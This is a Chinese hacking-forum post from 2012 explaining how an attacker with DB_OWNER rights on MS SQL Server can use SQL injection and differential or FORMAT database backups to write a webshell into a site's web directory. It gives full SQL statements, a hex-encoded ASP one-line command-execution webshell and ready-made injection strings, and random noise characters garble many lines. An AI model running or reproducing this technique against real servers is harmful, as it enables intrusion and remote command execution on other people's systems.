中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]
作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少3 ?" S7 p0 W; y  m; E) \0 d; J
  r9 k# ^4 I) d2 ~0 v" y$ J
一利用差异备份( L: `0 b) n5 e2 i
加一个参数WITH DIFFERENTIAL# Z7 }* r7 }* G+ E- V% X; M

/ R+ e8 M- w, z8 ^, Wdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s. z1 E. Y9 `' D) e7 L% @1 m$ |
create table [dbo].[xiaolu] ([cmd] [image]);
4 |1 c( q0 P2 D5 n. e5 d& ?insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
6 _2 a3 A8 ~  l4 x1 |9 udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
3 p$ E- `# V" z3 m9 U7 j5 V/ e* `% l: ?3 M, f  N% E/ X4 J7 x: N) a
二利用完全FORMAT
7 e. j5 f7 k& i4 c加一个参数WITH FROMAT$ ?( j8 m& ?2 E
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
" w) j8 t6 ?& S3 G9 e+ y: ~3 I  w9 r! D( @, T( z, ?, p/ p
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s- e! K  b$ G% d# p* e: h, S
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E): I' B' {, I& u7 l* b
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT% p* o8 |4 a" b5 E# v2 g) r

& a$ g( J% F4 [( o, E( J8 N总的来说就是那么简单几句,下面以备份数据库model为例子
3 }  H2 U8 p, ?9 d* V
1 c1 g; s. t5 a0 h5 {0 [4 rid=1;use model create table cmd(str image);insert into cmd(str) values (”)
  D7 M+ m: u$ F0 I0 I- _+ J
! Z5 {( A6 Y( g: l! Eid=1;backup database model to disk=’你的路径‘ with differential,format;–; \7 @& F/ W, D" x1 k+ `

  `' q2 z7 l* p4 R



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2